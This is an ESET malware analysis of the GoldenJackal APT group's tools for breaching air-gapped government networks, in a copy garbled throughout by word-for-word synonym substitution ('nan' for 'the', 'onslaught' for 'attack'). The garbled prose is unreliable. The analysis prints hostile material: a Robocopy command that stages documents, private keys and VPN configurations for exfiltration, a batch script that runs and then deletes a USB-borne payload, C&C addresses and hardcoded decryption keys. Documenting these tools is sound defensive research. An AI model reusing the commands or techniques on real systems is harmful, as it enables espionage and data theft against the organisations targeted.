Mind The (air) Gap: Goldenjackal Gooses Government Guardrails

ESET researchers discovered a bid of attacks connected a governmental statement successful Europe utilizing devices tin of targeting air-gapped systems. The campaign, which we property to GoldenJackal, a cyberespionage APT group that targets authorities and negotiated entities, took spot from May 2022 to March 2024. By analyzing nan toolset deployed by nan group, we were capable to place an onslaught GoldenJackal carried retired earlier, successful 2019, against a South Asian embassy successful Belarus that, yet again, targeted nan embassy’s air-gapped systems pinch civilization tools.

This blogpost introduces antecedently undocumented devices that we property to GoldenJackal based connected victimology, code, and functional similarities betwixt nan toolsets.

Key points of nan blogpost:

• GoldenJackal utilized a civilization toolset to target air-gapped systems astatine a South Asian embassy successful Belarus since astatine slightest August 2019. In this blogpost, we picture these devices publically for nan first time.
• This blogpost besides features nan first nationalist explanation of a highly modular toolset GoldenJackal deployed connected various occasions betwixt May 2022 and March 2024 against a nationalist authorities statement of a state successful nan European Union.
• These toolsets supply GoldenJackal a wide group of capabilities for compromising and persisting successful targeted networks. Victimized systems are abused to cod absorbing information, process nan information, exfiltrate files, and administer files, configurations and commands to different systems.
• The eventual extremity of GoldenJackal seems to beryllium stealing confidential information, particularly from high-profile machines that mightiness not beryllium connected to nan internet.

GoldenJackal profile

GoldenJackal is an APT group progressive since astatine slightest 2019. It targets authorities and negotiated entities successful Europe, nan Middle East, and South Asia. The group is small known and has only been publically described successful 2023 by Kaspersky. The group’s known toolset includes respective implants written successful C#: JackalControl, JackalSteal, JackalWorm, JackalPerInfo, and JackalScreenWatcher – each of them utilized for espionage.

Overview

In May 2022, we discovered a toolset that we could not property to immoderate APT group. But erstwhile nan attackers utilized a instrumentality akin to 1 of those publically documented by Kaspersky, we were capable to excavation deeper and to find a relationship betwixt nan publically documented toolset of GoldenJackal and this caller one.

Extrapolating from that, we managed to place an earlier onslaught wherever nan publically documented toolset was deployed, arsenic good arsenic an older toolset that besides has capabilities to target air-gapped systems. This blogpost shines a ray connected nan method aspects of nan publically undocumented toolsets, and shares immoderate insights astir GoldenJackal’s tactics, techniques, and procedures.

Victimology

GoldenJackal has been targeting governmental entities successful Europe, nan Middle East, and South Asia. We detected GoldenJackal devices astatine a South Asian embassy successful Belarus successful August and September 2019, and again successful July 2021.

Kaspersky reported a constricted number of attacks against authorities and negotiated entities successful nan Middle East and South Asia, starting successful 2020.

More recently, according to ESET telemetry, a nationalist authorities statement of a state successful nan European Union was many times targeted from May 2022 until March 2024.

Attribution

All nan campaigns that we picture successful this blogpost deployed, astatine immoderate point, astatine slightest 1 of nan devices attributed to nan GoldenJackal APT group by Kaspersky. As was nan lawsuit successful nan Kaspersky report, we can’t property GoldenJackal’s activities to immoderate circumstantial nation-state. There is, however, 1 hint that mightiness constituent towards nan root of nan attacks: successful nan GoldenHowl malware, nan C&C protocol is referred to arsenic transport_http, which is an look typically utilized by Turla (see our ComRat v4 report) and MoustachedBouncer. This whitethorn bespeak that nan developers of GoldenHowl are Russian speakers.

Breaching air-gapped systems

In bid to minimize nan consequence of compromise, highly delicate networks are often aerial gapped, i.e., isolated from different networks. Usually, organizations will aerial spread their astir valuable systems, specified arsenic voting systems and business power systems moving powerfulness grids. These are often precisely nan networks that are of astir liking to attackers.

As we stated successful a erstwhile achromatic insubstantial titled Jumping nan aerial gap: 15 years of nation-state effort, compromising an air-gapped web is overmuch much resource-intensive than breaching an internet-connected system, which intends that frameworks designed to onslaught air-gapped networks person truthful acold been exclusively developed by APT groups. The intent of specified attacks is ever espionage, possibly pinch a broadside of sabotage.

With nan level of sophistication required, it is rather different that successful 5 years, GoldenJackal managed to build and deploy not one, but 2 abstracted toolsets designed to discuss air-gapped systems. This speaks to nan resourcefulness of nan group. The attacks against a South Asian embassy successful Belarus made usage of civilization devices that we person only seen successful that circumstantial instance. The run utilized 3 main components: GoldenDealer to present executables to nan air-gapped strategy via USB monitoring; GoldenHowl, a modular backdoor pinch various functionalities; and GoldenRobo, a record collector and exfiltrator.

In nan latest bid of attacks against a authorities statement successful Europe, GoldenJackal moved connected from nan original toolset to a new, highly modular one. This modular attack applied not only to nan creation of nan malicious devices (as was nan lawsuit pinch GoldenHowl), but besides to their roles: they were used, among different things, to cod and process absorbing information, to administer files, configurations, and commands to different systems, and to exfiltrate files.

Technical analysis

Initial access

So far, we haven’t been capable to trace backmost to nan first discuss vector successful nan campaigns seen successful our telemetry. Note that Kaspersky reported successful a blogpost that GoldenJackal utilized trojanized package and malicious documents for this purpose.

The mysterious toolset from 2019

The earliest onslaught that we person attributed to GoldenJackal, which targeted a South Asian embassy successful Belarus, occurred successful August 2019. The toolset utilized successful this onslaught is, to nan champion of our knowledge, publically undocumented. We’ve only observed nan pursuing civilization devices once, and ne'er again:

• A malicious constituent that tin present executables to air-gapped systems via USB drives. We’ve named this constituent GoldenDealer.
• A backdoor, which we’ve named GoldenHowl, pinch various modules for malicious capabilities.
• A malicious record collector and exfiltrator, which we’ve named GoldenRobo.

An overview of nan onslaught is shown successful Figure 1. The first onslaught vector is unknown, truthful we presume that GoldenDealer and an chartless worm constituent are already coming connected a compromised PC that has entree to nan internet. Whenever a USB thrust is inserted, nan chartless constituent copies itself and nan GoldenDealer constituent to nan drive. While we didn’t observe this chartless component, we person seen components pinch akin purposes – specified arsenic JackalWorm – successful different toolsets utilized successful later attacks performed by nan group.

Figure 1. Overview of nan first discuss of an air-gapped system

It is probable that this chartless constituent finds nan past modified directory connected nan USB drive, hides it, and renames itself pinch nan sanction of this directory, which is done by JackalWorm. We besides judge that nan constituent uses a files icon, to entice nan personification to tally it erstwhile nan USB thrust is inserted successful an air-gapped system, which again is done by JackalWorm.

When nan thrust is again inserted into nan internet-connected PC, GoldenDealer takes nan accusation astir nan air-gapped PC from nan USB thrust and sends it to nan C&C server. The server replies pinch 1 aliases much executables to beryllium tally connected nan air-gapped PC. Finally, erstwhile nan thrust is again inserted into nan air-gapped PC, GoldenDealer takes nan executables from nan thrust and runs them. Note that this clip nary personification relationship is needed, because GoldenDealer is already running.

We person observed GoldenDealer moving GoldenHowl connected an internet-connected PC. While we didn’t observe GoldenDealer straight executing GoldenRobo, we observed nan second besides moving connected nan connected PC, utilized to return files from nan USB thrust and exfiltrate them to its C&C server. There must beryllium yet different chartless constituent that copies files from nan air-gapped PC to nan USB drive, but we haven’t observed it yet.

GoldenDealer

This constituent monitors nan insertion of removable drives connected some air-gapped and connected PCs, arsenic good arsenic net connectivity. Based connected nan latter, it tin download executable files from a C&C server and hide them connected removable drives, aliases retrieve them from these drives and execute them connected systems that person nary connectivity.

The programme tin beryllium tally pinch aliases without arguments. When tally pinch arguments, it takes a way to a record that it moves to a caller location and past runs via nan CreateProcessW API without creating a window.

To forestall hidden files being shown successful Windows Explorer, GoldenDealer creates nan ShowSuperHidden worth successful nan HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced registry key, and sets it to zero.

In lawsuit GoldenDealer is not moving arsenic a service, it creates and starts a work called NetDnsActivatorSharing, past exits. If for immoderate logic nan work couldn’t beryllium created, persistence is achieved by creating an introduction successful a Run registry key.

Table 1 shows nan database of configuration files utilized by GoldenDealer. These are located successful nan directory from which nan malware is running: C:\Windows\TAPI successful nan observed attack. More specifications astir these files is provided successful consequent sections.

Table 1. Configuration files utilized by GoldenDealer

Filename	Purpose
b8b9-de4d-3b06-9d44	Store position fields.
fb43-138c-2eb0-c651	Store executable files sent by nan C&C server.
130d-1154-30ce-be1e	Store accusation astir each compromised PCs successful nan network.
38c4-abb9-74f5-c4e5	Used arsenic a mutex. If this record is open, it intends that an lawsuit of GoldenDealer is already running.

The contents of configuration files are JSON formatted, and stored XOR encrypted connected disk. XOR encryption is performed 1 byte astatine a time, pinch a single-byte cardinal that is incremented based connected a multiplier.

Network connectivity thread

In bid to find whether a PC is connected to nan internet, GoldenDealer sends a GET petition to https://1.1.1.1/<user_id> each 15 minutes. If nan relationship fails, aliases there’s nary reply, nan PC is assumed to beryllium offline. 1.1.1.1 maps to Cloudflare’s DNS resolver, and nan expected behaviour is to person a Not Found archive and a 404 position code. The <user_id> portion is not applicable here, but is utilized for C&C communication. GoldenDealer generates this personification identifier based on:

• The existent username arsenic recovered via nan GetUserNameW API.
• The serial number of nan first disposable logical thrust successful nan system. This does not needfully mean nan thrust wherever nan OS is installed.

These 2 strings are separately hashed pinch nan FNV-1a function, and nan resulting numbers are XORed together, obtaining a number that identifies nan user.

To support way of web connectivity status, GoldenDealer uses a world adaptable that tin clasp immoderate of nan pursuing values:

• 0 – Malware started moving and connectivity has not been checked.
• 1 – PC doesn’t person net connectivity.
• 2 – PC has net connectivity.

If nan position is 2, a thread is signaled to download executable files from nan C&C server, and different thread is signaled to transcript nan executables to USB drives. A thread to get executables from drives and tally them will only beryllium signaled erstwhile nan position is 1. Whenever nan position changes, nan configuration record b8b9-de4d-3b06-9d44 is updated pinch nan caller value. Fields successful this record are:

• wmk – web connectivity status.
• qotwnk – number of seconds without internet. This worth is incremented each 15 minutes and reset to zero erstwhile there’s connectivity. It tin beryllium utilized if nan malware is configured to hold a minimum number of seconds earlier deciding that nan PC has nary connectivity, but location was nary hold successful nan samples that we observed.
• ltwnk – unknown. This section is not utilized by nan malware.
• rpk – database pinch hashes of executables downloaded from nan C&C server.

Downloader thread

This thread checks nan web connectivity position each 30 minutes, and only performs nan pursuing actions if nan PC is connected to nan internet. First, a GET petition is sent to https://83.24.9[.]124/<user_id>, conscionable to fto nan C&C server cognize that different petition is to follow. The reply from nan server is not processed. If nan petition fails, past different petition is sent to a secondary server, http://196.29.32[.]210/<user_id>, astir apt to notify astir failure, arsenic nan thread doesn’t proceed to execute successful this case. The URLs are hardcoded successful nan malware and are not configurable successful nan samples that we observed.

When connection is successful, GoldenDealer sends a petition to https://83.24.9[.]124/<user_id>/fc93-10f4-2a68-d548. The server replies pinch an array of JSON objects pinch nan pursuing fields:

• ek – a base64-encoded drawstring that is an executable record aft being decoded,
• tpik – an array of user_ids utilized to determine whether nan executable will beryllium run,
• hek – nan FNV-1a hash of ek, and
• apk – day and clip erstwhile nan executable was obtained from nan C&C server.

The contents of nan past 2 fields are not relevant, because they are calculated by nan downloader thread, replacing original information sent by nan C&C server. In some cases, they are stored arsenic decimal numbers.

GoldenDealer will tally an executable sent by nan server if nan corresponding user_id is successful nan tpik list, and nan hek hash is not successful nan database of hashes stored successful nan rpk section successful nan configuration. In different words, connected PCs tin download executables and walk them on to different systems via USB drives, but they tin besides tally received executables. When an executable is run, its hash is added to nan rpk list, ensuring that it will only beryllium executed erstwhile by that victim. Each executable is written successful nan moving directory pinch nan worth of <hek> arsenic its filename. All JSON objects pinch received executables are stored connected disk, successful nan record fb43-138c-2eb0-c651.

As nan last step, nan downloader thread collects accusation astir nan compromised strategy and sends it to https://83.24.9[.]124/<user_id>/a1e7-4228-df20-1600. The configuration record 130d-1154-30ce-be1e is updated to shop this accusation arsenic well. Figure 2 shows portion of nan JSON entity pinch nan accusation sent to nan C&C server. While each strings are sent arsenic arrays of decimal characteristic codes, for readability we show them arsenic strings successful nan image. For example, alternatively of lsass.exe, nan worth [108, 115, 97, 115, 115, 46, 101, 120, 101] is really sent.

Figure 2. Part of nan accusation sent by nan downloader thread to nan C&C server

The members are:

• iepk – a Boolean worth that indicates whether nan GoldenDealer process is elevated,
• pclk – an array of moving processes,
• pglk – an array of installed programs successful some Program Files and Program Files (x86) directories,
• pik – nan user_id,
• sik – accusation astir nan operating strategy (including version, build, work battalion number; architecture; and Boolean values indicating whether nan OS is moving connected a server, domain controller, aliases workstation),
• uck – nan personification who is moving nan GoldenDealer process, and
• ulk – an array of each users, each pinch a Boolean worth indicating whether nan personification has administrator privileges.

USB monitoring thread connected connected PCs

GoldenDealer monitors nan insertion of removable drives by creating a model titled defaultWindow pinch a civilization arena handler that processes inserted devices and ignores each different strategy events.

Once a USB thrust has been inserted, this thread patches 1 byte successful nan maestro footwear grounds (MBR) of that drive: it searches for nan offset wherever nan BOOTMGR drawstring resides, and replaces nan first O pinch 0. Then it checks whether nan 2nd O has besides been patched to 0, and exits if it hasn’t. The USB thread that runs connected air-gapped PCs does nan opposite: it patches nan 2nd O, and checks whether nan first has already been patched. This intends that nan USB thrust needs to person been inserted successful some a connected PC and an air-gapped PC for nan thrust to beryllium processed.

If nan cheque is successful, a hidden directory is created connected nan USB drive, pinch 2 files written inside:

• 37b3-ebe5-568e-0676 – this record has nan aforesaid contents arsenic fb43-138c-2eb0-c651 (all nan executables sent by nan C&C server). It’s utilized to walk nan executables to air-gapped systems, for execution.
• bc41-ac6f-e55e-61a8 – a record pinch accusation from air-gapped PCs. It’s created quiet by this thread, past populated by nan USB thread moving connected air-gapped PCs. The contents of this record are appended to nan section record 130d-1154-30ce-be1e (see Table 1), to beryllium sent to nan C&C server by nan downloader thread.

USB monitoring thread connected air-gapped PCs

This is complementary to nan thread described successful nan erstwhile section: it takes nan record 37b3-ebe5-568e-0676 pinch executables connected nan USB thrust and copies its contents to nan section record fb43-138c-2eb0-c651. It besides takes nan section record 130d-1154-30ce-be1e pinch accusation astir nan air-gapped strategy and adds its contents to nan bc41-ac6f-e55e-61a8 record connected nan USB drive. The codification to get strategy accusation and to tally executables is contained successful this thread.

GoldenHowl

Another instrumentality from GoldenJackal’s 2019 toolset is GoldenHowl, a backdoor written successful Python that consists of various modules for malicious functionalities. It is distributed arsenic a self-extracting archive that contains morganatic Python binaries and libraries, arsenic good arsenic malicious scripts. Figure 3 shows nan contents of 1 of these archives. The attackers renamed nan Python executable – successful type 2.7.15 – arsenic WinAeroModule.exe. This constituent is intended to beryllium tally connected PCs pinch net connectivity, fixed its functionalities.

Figure 3. Contents of GoldenHowl’s self-extracting archive

The first book successful GoldenHowl, referred to arsenic core_script successful nan malware’s configuration file, performs nan pursuing actions:

• decrypts and loads nan malware’s configuration from a JSON file,
• creates directories utilized by nan malware, and
• starts a thread for each module.

The malware’s configuration is decrypted utilizing nan Fernet algorithm, pinch nan hardcoded cardinal _ylmUTbqcx6FxMZ5ZvNxDQZYuNh41yxhKcPJLzxgqEY=. Figure 4 shows portion of nan decrypted configuration.

Figure 4. Part of GoldenHowl’s decrypted configuration

Table 2 shows nan Python modules that we’ve observed – successful nan bid that they look successful nan config – on pinch a explanation of their functionalities. All modules tally indefinitely, isolated from for nan persistence_schtasks module, which runs only once.

Table 2. Malicious modules successful GoldenHowl

Module name	File connected disk	Description
persistence_schtasks	5991-8d44-b226⁠-⁠0e6c.py	Creates nan scheduled task Microsoft\Windows\Multimedia\SystemSoundsService2 to persist nan execution of core_script.
files_tree	edc5-4055-37cd-d2d2.py	Generates a listing of files and directories by calling Windows’ character command, for a way specified successful a petition sent by nan C&C.
files_stealer	5488-240b-c00f-203a.py	Exfiltrates a azygous record to nan C&C server. The record way is specified successful a petition sent by nan C&C.
data_transform	8744-a287-35be-4ea0.py	Utility module that takes incoming requests from nan C&C server and decrypts them, and takes responses from different modules that request to beryllium sent to nan C&C and encrypts them. The encryption algorithm is Fernet, and nan cardinal is circumstantial to this module: QRqXhd_iB_Y3LpT2wTVK6Dao5uOq2m5KMiVkMnJfgw4=
transport_http	63d5-be5f-e4df-7e65.py	Utility module that uploads and downloads files from nan C&C server. See nan C&C communication conception for much information. Note that nan connection carrier is commonly utilized by Turla and MoustachedBouncer to mention to a type of C&C protocol. Although this mightiness beryllium shared crossed Russian-speaking developers, this is simply a debased assurance constituent for attribution.
updater	c7b4-0999-aec4-a0c8.py	Utility module that receives a ZIP archive pinch updated modules aliases configuration from nan C&C server, extracts nan archive, and runs core_script successful a caller process, terminating nan existent process.
sshcmd	1ee0-7c3a-3331-4df3.py	Connects to an SSH server specified successful a petition sent by nan C&C. Acts arsenic a reverse shell, executing commands received from nan C&C.
ipscanner	a86b-108c-36c7-6972.py	Generates a listing pinch progressive IP addresses successful an IP range, based connected an IP disguise specified successful a petition sent by nan C&C server. To do so, it first sends a connection to each IP addresses successful nan range, connected larboard 59173, and past it runs nan bid arp -a to get nan ARP cache tables for each interfaces.
portscanner	2648-69f9-6dc0-3476.py	Generates a listing pinch ports that are accepting connections, based connected an IP reside and a database of ports specified successful a petition sent by nan C&C server.
sshtunnel	9ea4-fb87-6d57-924a.py	Creates an SSH passageway pinch an SSH server, to guardant messages going from (and to) a big connected a listening port, to a forwarding larboard connected nan SSH server. A petition from nan C&C server specifies: nan reside and larboard of nan SSH server, username and password for nan SSH session, nan forwarding larboard connected nan SSH server, and nan reside and larboard of nan listening host.
eternalbluechecker	4b19-7f72-8c17-dceb.py	Checks whether a host, specified successful a petition sent by nan C&C server, is susceptible to a Windows SMB distant codification execution vulnerability. The codification for this module is nan aforesaid arsenic successful mysmb.py and checker.py from this nationalist repository. There is nary codification successful this module to utilization susceptible hosts.
socks_proxy	8b55-3ac9-5c30-d0c4.py	Acts arsenic a proxy server, forwarding packets from a root reside to a destination address. The larboard to perceive for incoming connections is specified successful a petition sent by nan C&C server. The codification successful this module is very akin to that of pysoxy.
text_writer	0ffc-667e-dce4-b270.py	Writes a matter record to a fixed path. The way and matter for penning are specified successful a petition sent by nan C&C server.

C&C communication

According to GoldenHowl’s configuration, thing that comes from nan C&C server is called a request, and files going to nan C&C server correspond a response. It should beryllium noted that contempt this naming convention, GoldenHowl is not a passive implant: it initiates nan connections to nan C&C server. The transport_http module is responsible for connection pinch nan C&C server, and for penning requests and responses to circumstantial directories. Table 3 shows directories utilized by GoldenHowl.

Table 3. Directories successful GoldenHowl’s configuration

Name in configuration	Name connected disk	Description
download_dir	a700‑280c‑f067‑5a06	Stores encrypted requests coming from nan C&C server.
upload_dir	b307‑05ea‑7ac8‑c369	Stores encrypted responses, pinch files aliases output of commands, to beryllium sent to nan C&C server.
data_dir	cda2‑b818‑3403‑b564	Stores requests sent by nan C&C server, which are taken from download_dir, decrypted, and placed successful this directory for modules to process. Also stores output of executed commands (responses), which are taken from this directory, encrypted, and written to upload_dir. These actions are performed by nan data_transform module.
temp_dir	5bc5‑0788‑d469‑2f3a	This directory was not utilized successful immoderate observed modules.

Requests and responses person system filenames:

• Request – <client_id><module_id><request_id><request_suffix>
• Response – <client_id><module_id><request_id><response_suffix>

The fields client_id, request_suffix, and response_suffix are specified successful nan configuration and are communal to each modules (see Figure 4 for examples). The section module_id indicates which module needs to process a petition aliases make a response, and is defined successful nan configuration conception of each individual module. The section request_id is generated connected nan C&C server, and ties together requests pinch responses.

The transport_http module sends GET requests periodically to nan C&C server to cheque for disposable requests. The configuration fields circumstantial to this module are:

• server_address – reside of nan C&C server (we observed 83.24.9[.]124, nan aforesaid reside arsenic GoldenDealer’s server),
• server_port – nan larboard utilized to pass pinch nan server (we observed 443),
• server_use_ssl – indicates whether HTTP aliases HTTPS will beryllium utilized for communication,
• base_timeout_sec – nan minimum hold clip earlier contacting nan C&C server, and
• timeout_filename – nan filename of a matter record pinch a number betwixt 0 and 3600, to specify a different number of seconds to hold betwixt communications. This record is not included pinch GoldenHowl, but it could beryllium placed by nan attackers pinch nan text_writer module.

The reside utilized to interaction nan C&C server is https://<server_address>:<server_port>/<client_id>/.

GoldenRobo

The past of nan observed devices from nan 2019 toolset, GoldenRobo, is simply a elemental constituent written successful Go that executes nan Robocopy inferior to shape files and nonstop them to its C&C server. It iterates crossed each thrust letters from A to Z, trying to entree each drive. If successful, a Robocopy bid is constructed:

robocopy <drive_letter>:\ <malware_folder>\1516-fe89-ad12-8102\<drive_letter>\ *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.pdf *.rtf *.tif *.jpg *.jpeg *.crt *.key *.p12 *.ovpn *.zip *.rar "" /S /R:0 /MAXAGE:7 /XD <malware_folder>\1516-fe89-ad12-8102\\ 1516-fe89-ad12-8102\\ "Application Data" "All Users" "Documents and Settings" "Local Settings"

If we break down nan command:

• files are copied from drive_letter,
• to <malware_folder>\1516-fe89-ad12-8102\<drive_letter>\ (for example: C:\Windows\TAPI\1516-fe89-ad12-8102\C\),
• only if nan files person extensions .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rtf, .tif, .jpg, .jpeg, .crt, .key, .p12, .ovpn, .zip, or .rar,
• including subdirectories (/S),
• not retrying connected grounded copies (/R:0),
• excluding files older than 7 days (/MAXAGE:7), and
• excluding specified directories (/XD).

Copied files from each drives are archived together successful a ZIP record _1423-da77-fe86<month>-<day> successful nan aforesaid directory wherever GoldenRobo is moving (with <month> and <day> corresponding to nan existent date).

The archive is sent base64 encoded to https://83.24.9[.]124/8102/. The past portion of nan URL is 8102, which is nan aforesaid arsenic nan client_id section successful GoldenHowl’s configuration. This URL is hardcoded successful GoldenRobo, which tells america that nan attackers compiled this type of GoldenRobo for this unfortunate exclusively.

The known toolset: Previously documented by Kaspersky

A fewer weeks aft deploying nan erstwhile toolset, GoldenJackal started to usage different malicious devices connected nan aforesaid compromised computers. In September 2019, we observed nan execution of PowerShell scripts to download nan JackalControl backdoor. This backdoor was utilized to execute different PowerShell scripts, to download and tally morganatic devices specified arsenic Plink and PsExec.

In various attacks, betwixt September 2019 and January 2024, we observed nan pursuing devices successful GoldenJackal’s arsenal:

• JackalControl,
• JackalSteal, a record collector and exfiltrator, and
• JackalWorm, utilized to propagate different malicious components via USB drives. We observed it propagating nan JackalControl backdoor.

As these components person already been documented by Kaspersky, we will not picture them successful this blogpost. However, 1 absorbing constituent to mention is that successful early versions of these tools, URLs for C&C servers were hardcoded successful nan malware binaries. At immoderate point, GoldenJackal modified JackalControl and JackalSteal to person C&C servers arsenic arguments.

The latest toolset: Keeping a foothold successful nan network

In May 2022, we observed GoldenJackal utilizing a caller toolset while targeting a governmental statement successful Europe. Most of these devices are written successful Go and supply divers capabilities, specified arsenic collecting files from USB drives, spreading payloads successful nan web via USB drives, exfiltrating files, and utilizing immoderate PCs successful nan web arsenic servers to present divers files to different systems. In addition, we person seen nan attackers utilizing Impacket to move laterally crossed nan network.

In nan observed attacks, GoldenJackal started to usage a highly modular approach, utilizing various components to execute different tasks. Some hosts were abused to exfiltrate files, others were utilized arsenic section servers to person and administer staged files aliases configuration files, and others were deemed absorbing for record collection, for espionage purposes. Figure 5 shows a classification of nan components that are described complete nan adjacent sections.

Figure 5. Components successful GoldenJackal’s latest toolset

Regarding web infrastructure, we didn’t observe immoderate outer IP addresses successful immoderate of nan analyzed components. File exfiltrators usage publically disposable services specified arsenic Google Drive aliases Outlook SMTP servers.

GoldenUsbCopy

GoldenUsbCopy, which we categorize arsenic a postulation component, monitors nan insertion of USB drives, and copies absorbing files to an encrypted instrumentality that is stored connected disk, to beryllium exfiltrated by different components. According to strings recovered successful nan binary, nan main package for nan exertion is named UsbCopy.

Newly inserted drives are detected by creating a model pinch sanction WindowsUpdateManager, to person strategy events and process them pinch a civilization handler. If nan handler receives a WM_DEVICECHANGE message, pinch an arena type DBT_DEVICEARRIVAL, and nan instrumentality type is DBT_DEVTYP_VOLUME, this intends a caller thrust is fresh to beryllium processed. Figure 6 shows a side-by-side comparison betwixt decompiled codification successful GoldenUsbCopy and GoldenDealer. Even though each was written successful a different programming language, we tin spot that nan codification retrieves nan missive of nan thrust to process successful nan aforesaid manner.

Figure 6. Code comparison betwixt GoldenUsbCopy and GoldenDealer

GoldenUsbCopy determines which files to process from a USB thrust based connected a configuration that is stored AES encrypted successful CFB mode successful nan record reports.ini. The 32-byte cardinal to decrypt nan configuration is hardcoded successful nan malware. After decryption, nan configuration contains nan pursuing fields, successful JSON format:

• outputCipherFilename – afloat way to an encrypted archive that acts arsenic a instrumentality for different files, specified arsenic files that incorporate listings of filenames from recently inserted drives, and files to beryllium exfiltrated,
• RSAKey – a nationalist cardinal to encrypt AES keys that are utilized to encrypt files to beryllium exfiltrated,
• lastDate – files that were past modified much than lastDate days agone are not processed,
• registryKey – a cardinal successful HKEY_CURRENT_USER that will shop SHA-256 hashes of files already processed for exfiltration,
• registryValue – nan registry worth that stores nan database of hashes,
• maxZIPSize – nan maximum size successful bytes for outputCipherFilename (more specifications below),
• maxFileSize – files larger than maxFileSize, successful bytes, are not exfiltrated, and
• extensionsFile – a database of record extensions for exfiltration (we observed .docx, .pdf, .doc, and .odt).

Once nan configuration is decrypted, GoldenUsbCopy waits for a USB thrust to beryllium inserted. A listing of each files connected nan inserted thrust is written to a matter file, which is past archived successful a ZIP file, encrypted pinch AES, and added to outputCipherFilename. Only nan encrypted instrumentality is written to disk; intermediate steps, involving matter files and archives, are kept successful memory.

A akin process is done for files connected nan thrust that meet nan criteria for exfiltration: these files are archived together preserving their directory structure, encrypted pinch AES, and added to outputCipherFilename. When selecting files for exfiltration, a database pinch SHA-256 hashes is retrieved from nan registry. If nan hash of a record is successful that list, nan record is not exfiltrated. If nan hash isn’t successful nan list, it is added, truthful that nan record won’t beryllium exfiltrated again.

Whenever adding files to exfiltrate would transcend nan maxZIPSize of outputCipherFilename, nan excess files are not added to nan archive for exfiltration, but their paths are added to a matter record that is archived, encrypted, and added to outputCipherFilename.

Regarding encryption, each individual archive that is added to nan encrypted instrumentality is encrypted pinch AES successful CFB mode, pinch a cardinal and an initialization vector (IV) that are randomly generated connected nan spot. Both nan cardinal and IV request to beryllium stored, but only nan cardinal is encrypted pinch RSAKey. Figure 7 shows an illustration of really these fields are stored successful nan encrypted container.

Figure 7. Structure of nan encrypted container

GoldenUsbGo

This constituent is very akin to GoldenUsbCopy and seems to beryllium a later type of it, based connected erstwhile we observed them successful our telemetry and comparing Go versions utilized to compile them. However, GoldenUsbGo achieves nan aforesaid functionality pinch a simpler implementation:

• There is nary configuration file. All criteria for record action are hardcoded successful nan malware:
  • if filename contains a circumstantial connection from a list, process nan record sloppy of each different criteria (the database contains strings specified arsenic pass, login, and key),
  • else, record size must beryllium nary bigger than 20 MB,
  • the day nan record was past modified must beryllium nary much than 14 days ago, and
  • the record hold must beryllium 1 of .pdf, .doc, .docx, .sh, aliases .bat.
• Insertion of removable drives is not continuously monitored. A hardcoded database of thrust letters is checked periodically to find if they person an assigned measurement of D:, E:, F:, G:, aliases H:.
• The database of hashes of files that were already processed is kept successful representation only.
• There is nary size limit for nan encrypted instrumentality wherever files are staged for exfiltration.
• Files are not archived but alternatively are compressed pinch gzip. Both record contents and filenames are compressed. Figure 8 shows really compressed information is arranged earlier encryption.

Figure 8. Fields utilized for gzip-compressed files, earlier encryption

The way to nan encrypted instrumentality is hardcoded successful nan malware:

C:\Users\[redacted]\appdata\local\SquirrelTemp\SquirrelCache.dat

The hardcoded username successful nan path, redacted above, on pinch nan short database of drives and circumstantial filenames to process, show america that GoldenUsbGo was compiled and tailored for this peculiar victim.

Compressed files are encrypted pinch AES successful CFB mode pinch nan hardcoded cardinal Fn$@-fR_*+!13bN5. The building is nan aforesaid arsenic successful GoldenUsbCopy (shown successful Figure 7) but without nan AES key. After compressing nan files, GoldenUsbGo generates a listing of each files connected nan inserted thrust and adds it to nan encrypted container, successful nan aforesaid mode arsenic exfiltrated files. The filename for nan listing is formed from nan existent day and time, replacing : pinch - (for example, 15 Jan 24 13-21 PST).

GoldenAce

This component, which we classified arsenic a distribution instrumentality successful Figure 5, serves to propagate different malicious executables and retrieve staged files via USB drives. While it could beryllium utilized to target air-gapped systems, it’s not specifically built for that, arsenic opposed to GoldenDealer. It useful together pinch a lightweight type of JackalWorm and immoderate different chartless component.

GoldenAce periodically checks drives successful nan database G:, H:, I:, J:, K:, L:, M:, N:, P:, X:, Y:, and Z:, to find 1 that is mapped to a volume. Then it checks whether a trash directory exists successful nan guidelines of that drive. If it doesn’t exist, it is created arsenic hidden, and a record called update is copied to that directory, from nan aforesaid location wherever GoldenAce is running. The first directory connected nan thrust (in alphabetical order) that is not hidden is group to hidden, and a record called upgrade is copied to nan guidelines of nan thrust and renamed arsenic <name_of_hidden_directory>.exe.

The record upgrade is really JackalWorm, an executable that uses a files icon, and whose intent is to transcript and tally nan update record connected different strategy wherever nan USB thrust is inserted. Unlike nan type of JackalWorm described by Kaspersky, this 1 is very limited: it doesn’t person codification to show thrust insertions, and it cannot beryllium configured to execute various actions. When executed from nan guidelines directory of a removable drive, it opens nan hidden files successful Windows Explorer and writes a batch record to execute nan payload successful update. Contents of this file, update.bat, are shown successful Figure 9.

@echo off copy "<drive_letter>:\\trash\\update" "C:\\Users\\%username%\\AppData\\Local\\update.exe" "C:\\Users\\%username%\\AppData\\Local\\update.exe" "<drive_letter>:\\trash" :check1 @tasklist | findstr /i /b "update.exe" >nul @if %errorlevel%==0 goto check1 @del /f /q /a h "C:\\Users\\%username%\\AppData\\Local\\update.exe" @del /f /q "C:\\Users\\<username>\\AppData\\Local\\update.bat"

Figure 9. Contents of update.bat

We tin spot that update is tally and deleted, on pinch nan batch file, erstwhile it’s done running. While we didn’t observe nan contents of nan update component, it is apt that it collects files and stages them successful nan trash directory connected nan removable drive, since nan way to that directory is passed arsenic an statement to update.

When GoldenAce finds that nan directory trash already exists connected a drive, alternatively of copying files to nan drive, it copies files successful nan trash directory to C:\ProgramData\Microsoft\Windows\DeviceMetadataCache.

HTTP server

We observed Python’s HTTP server, packaged pinch PyInstaller, being executed via C:\Windows\system32\cmd.exe /K C:\Windows\msahci.cmd. Unfortunately, we didn’t observe nan contents of nan msahci.cmd file, truthful we don’t cognize nan arguments passed for execution, specified arsenic nan larboard for nan server to perceive on.

GoldenBlacklist

As a processing component, GoldenBlacklist downloads an encrypted archive from a section server, and processes email messages contained successful it, to support only those of interest. Then it generates a caller archive for immoderate different constituent to exfiltrate.

The URL to retrieve nan first archive is hardcoded: https://<local_ip_address>/update46.zip. The downloaded record is saved arsenic res.out, and AES decrypted pinch nan hardcoded cardinal k9ksbu9Q34HBKJuzHIuGTfHL9xCzMl53vguheOYA8SiNoh6Jqe62F7APtQ9pE, utilizing a morganatic OpenSSL executable.

